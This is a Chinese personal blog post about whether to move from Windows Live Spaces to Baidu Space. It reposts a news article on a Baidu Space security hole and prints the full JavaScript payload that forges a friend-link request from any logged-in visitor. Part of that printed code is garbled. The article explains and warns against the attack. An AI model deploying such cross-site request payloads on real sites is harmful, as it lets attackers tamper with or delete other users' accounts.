Windows LiveWindows Live
 
 
VINCENT's profileV&NPhotosBlogListsMore Tools Help

Blog
    07 August

    关于百度空间的若干意见

    近期由于livespace的频繁调整(今天下午好像又有改动)和百度空间的新鲜出炉,很多人起了搬家的打算,我也曾经考虑过。说实话虽然百度空间提供的主题和其他装饰性的设置比较少,但是其开放CSS的做法还是吸引了很多人,只要懂点网页制作,完全可以使其效果几倍于msnspace,但是我无意中遇到下面这篇文章,猛然警醒,对于我这种对网页编程一窍不通的人来说,搬家无异于让我在维持现状和玩火XX之间做选择。在写这篇时,无意中看到百度4小时内撤掉了软件事业事业部,并在各种场合百度管理层都表示要将百度转变成“搜索+博客”(网址见引用通告),相信百度空间未来一定会有所改变。故在两个空间变动的同时,我认为还是应持观望态度,毕竟两者在功能上都不能令人满意。
     
                       百度空间存在安全漏洞 用户被威胁删除数据
    百度空间上线后,很多网友为了宣传自己的百度空间,疯狂复制css代码。但与此同时也出现了百度空间的网络黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户遭遇危险。

      这是一个网友发来的短信求助,原文如下:

      有个黑客用javascript把我的链接改了..并威胁我如果删除连接就删除我的空间,最怕的就是这样的人..我想问您了解一下他能用同样的手段篡改我页面的其他信息吗..最好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷..谢谢..

      找到该“黑客”的空间,轻松发现其利用css代码加入js代码,然后又利用js代码的功能,分析百度空间在提交数据时的参数,构造出来一个恶意的js代码,功能是提交一个加入友情链接的请求到百度空间,导致访问该网站的已登陆百度空间用户在自己空间上自动的加一个友情链接。

      下边是利用代码:

    code:

      javascript:document.body.onload = function(){

      var req = null;

      if(window.XMLHttpRequest) req = new XMLHttpRequest();

      else if(window.ActiveXObject){

      var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

      for(var i=0;i

      try{req.overrideMimeType('text/xml')}catch(e){}

      }

      req.open('get','.',false);

      req.send();

      var s=req.responseText;

      p=s.indexOf('passport.baidu.com/?logout');

      if(p>0)

      {

      p=s.indexOf('');

      if(p>0)

      {

      p=s.indexOf('/',p);

      p2=s.indexOf(String.fromCharCode(34),p);

      var user=s.substring(p+1,p2);

      var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';

      var link='http://hi.baidu.com/haomm';

      var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB';

      var url='/'+user+'/commit';

      var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);

      req.open('post',url,false);

      req.send(data);

      }

      }

      }


      分析:

      该方法危险等级:高级。构造相应的js代码可以删除用户空间的所有数据。该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心。  

      解决办法:

      由于攻击者可能利用任何用户名的百度空间提交增加,删除,更改的链接,所以目前没有完美解决办法。

      给已经受害者解决办法:删除恶意链接,不再在登陆的情况下访问其空间链接。

    10:31 PM | Blog it

    Comments

    Please wait...
    Sorry, the comment you entered is too long. Please shorten it.
    You didn't enter anything. Please try again.
    Sorry, we can't add your comment right now. Please try again later.
    To add a comment, you need permission from your parent. Ask for permission
    Your parent has turned off comments.
    Sorry, we can't delete your comment right now. Please try again later.
    You've exceeded the maximum number of comments that can be left in one day. Please try again in 24 hours.
    Your account has had the ability to leave comments disabled because our systems indicate that you may be spamming other users. If you believe that your account has been disabled in error please contact Windows Live support.
    Complete the security check below to finish leaving your comment.
    The characters you type in the security check must match the characters in the picture or audio.

    To add a comment, sign in with your Windows Live ID (if you use Hotmail, Messenger, or Xbox LIVE, you have a Windows Live ID). Sign in


    Don't have a Windows Live ID? Sign up

    Trackbacks

    The trackback URL for this entry is:
    http://geyaming.spaces.live.com/blog/cns!F5BEF13822543339!277.trak
    Weblogs that reference this entry
    • None